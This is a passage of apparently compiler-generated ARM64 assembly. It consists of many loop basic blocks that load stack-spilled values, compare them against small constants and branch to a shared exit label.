ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_430
b LBB1_426
LBB1_426: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_429
b LBB1_427
LBB1_427: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_429
b LBB1_428
LBB1_428: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_430
b LBB1_429
LBB1_429: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #12
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_430
LBB1_430: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_433
b LBB1_431
LBB1_431: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #12
cset w8, ne
tbnz w8, #0, LBB1_433
b LBB1_432
LBB1_432: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #352] ; 8-byte Folded Reload
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_433
LBB1_433: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_437
b LBB1_434
LBB1_434: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #352] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_437
b LBB1_435
LBB1_435: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #12
cset w8, ne
tbnz w8, #0, LBB1_437
b LBB1_436
LBB1_436: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_437
LBB1_437: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-256] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_439
b LBB1_438
LBB1_438: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #912] ; 8-byte Folded Reload
ldr x8, [sp, #368] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_441
b LBB1_439
LBB1_439: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #392] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_441
b LBB1_440
LBB1_440: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_441
LBB1_441: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #392] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_443
b LBB1_442
LBB1_442: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_444
b LBB1_443
LBB1_443: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #368] ; 8-byte Folded Reload
ldr x8, [sp, #912] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_444
LBB1_444: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_446
b LBB1_445
LBB1_445: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #416] ; 8-byte Folded Reload
ldur x8, [x29, #-256] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_446
LBB1_446: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #392] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_449
b LBB1_447
LBB1_447: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_449
b LBB1_448
LBB1_448: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-256] ; 8-byte Folded Reload
ldr x8, [sp, #912] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_449
LBB1_449: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #392] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_453
b LBB1_450
LBB1_450: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_453
b LBB1_451
LBB1_451: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_453
b LBB1_452
LBB1_452: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_453
LBB1_453: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #392] ; 8-byte Folded Reload
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_458
b LBB1_454
LBB1_454: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_457
b LBB1_455
LBB1_455: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_457
b LBB1_456
LBB1_456: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_458
b LBB1_457
LBB1_457: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #13
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_458
LBB1_458: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_461
b LBB1_459
LBB1_459: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB1_461
b LBB1_460
LBB1_460: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #392] ; 8-byte Folded Reload
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_461
LBB1_461: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_465
b LBB1_462
LBB1_462: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #392] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_465
b LBB1_463
LBB1_463: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #13
cset w8, ne
tbnz w8, #0, LBB1_465
b LBB1_464
LBB1_464: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #936] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_465
LBB1_465: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-224] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_467
b LBB1_466
LBB1_466: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #952] ; 8-byte Folded Reload
ldr x8, [sp, #408] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_469
b LBB1_467
LBB1_467: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #432] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_469
b LBB1_468
LBB1_468: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_469
LBB1_469: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #432] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_471
b LBB1_470
LBB1_470: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_472
b LBB1_471
LBB1_471: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #408] ; 8-byte Folded Reload
ldr x8, [sp, #952] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_472
LBB1_472: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_474
b LBB1_473
LBB1_473: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #448] ; 8-byte Folded Reload
ldur x8, [x29, #-224] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_474
LBB1_474: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #432] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_477
b LBB1_475
LBB1_475: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_477
b LBB1_476
LBB1_476: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-224] ; 8-byte Folded Reload
ldr x8, [sp, #952] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_477
LBB1_477: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #432] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_481
b LBB1_478
LBB1_478: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_481
b LBB1_479
LBB1_479: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_481
b LBB1_480
LBB1_480: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_481
LBB1_481: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #432] ; 8-byte Folded Reload
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_486
b LBB1_482
LBB1_482: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_485
b LBB1_483
LBB1_483: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_485
b LBB1_484
LBB1_484: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_486
b LBB1_485
LBB1_485: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #14
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_486
LBB1_486: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_489
b LBB1_487
LBB1_487: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #14
cset w8, ne
tbnz w8, #0, LBB1_489
b LBB1_488
LBB1_488: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #432] ; 8-byte Folded Reload
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_489
LBB1_489: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_493
b LBB1_490
LBB1_490: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #432] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_493
b LBB1_491
LBB1_491: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #14
cset w8, ne
tbnz w8, #0, LBB1_493
b LBB1_492
LBB1_492: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-240] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_493
LBB1_493: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-192] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_495
b LBB1_494
LBB1_494: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-232] ; 8-byte Folded Reload
ldr x8, [sp, #440] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_497
b LBB1_495
LBB1_495: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #464] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_497
b LBB1_496
LBB1_496: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_497
LBB1_497: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #464] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_499
b LBB1_498
LBB1_498: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_500
b LBB1_499
LBB1_499: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #440] ; 8-byte Folded Reload
ldur x8, [x29, #-232] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_500
LBB1_500: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_502
b LBB1_501
LBB1_501: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #480] ; 8-byte Folded Reload
ldur x8, [x29, #-192] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_502
LBB1_502: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #464] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_505
b LBB1_503
LBB1_503: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_505
b LBB1_504
LBB1_504: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-192] ; 8-byte Folded Reload
ldur x8, [x29, #-232] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_505
LBB1_505: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #464] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_509
b LBB1_506
LBB1_506: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_509
b LBB1_507
LBB1_507: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_509
b LBB1_508
LBB1_508: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_509
LBB1_509: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #464] ; 8-byte Folded Reload
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_514
b LBB1_510
LBB1_510: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_513
b LBB1_511
LBB1_511: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_513
b LBB1_512
LBB1_512: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_514
b LBB1_513
LBB1_513: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #15
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_514
LBB1_514: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_517
b LBB1_515
LBB1_515: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #15
cset w8, ne
tbnz w8, #0, LBB1_517
b LBB1_516
LBB1_516: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #464] ; 8-byte Folded Reload
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_517
LBB1_517: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_521
b LBB1_518
LBB1_518: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #464] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_521
b LBB1_519
LBB1_519: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #15
cset w8, ne
tbnz w8, #0, LBB1_521
b LBB1_520
LBB1_520: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_521
LBB1_521: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-160] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_523
b LBB1_522
LBB1_522: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-200] ; 8-byte Folded Reload
ldr x8, [sp, #472] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_525
b LBB1_523
LBB1_523: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #496] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_525
b LBB1_524
LBB1_524: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_525
LBB1_525: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #496] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_527
b LBB1_526
LBB1_526: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_528
b LBB1_527
LBB1_527: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #472] ; 8-byte Folded Reload
ldur x8, [x29, #-200] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_528
LBB1_528: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_530
b LBB1_529
LBB1_529: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #520] ; 8-byte Folded Reload
ldur x8, [x29, #-160] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_530
LBB1_530: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #496] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_533
b LBB1_531
LBB1_531: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_533
b LBB1_532
LBB1_532: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-160] ; 8-byte Folded Reload
ldur x8, [x29, #-200] ; 8-byte Folded Reload
ldr w8, [x8]
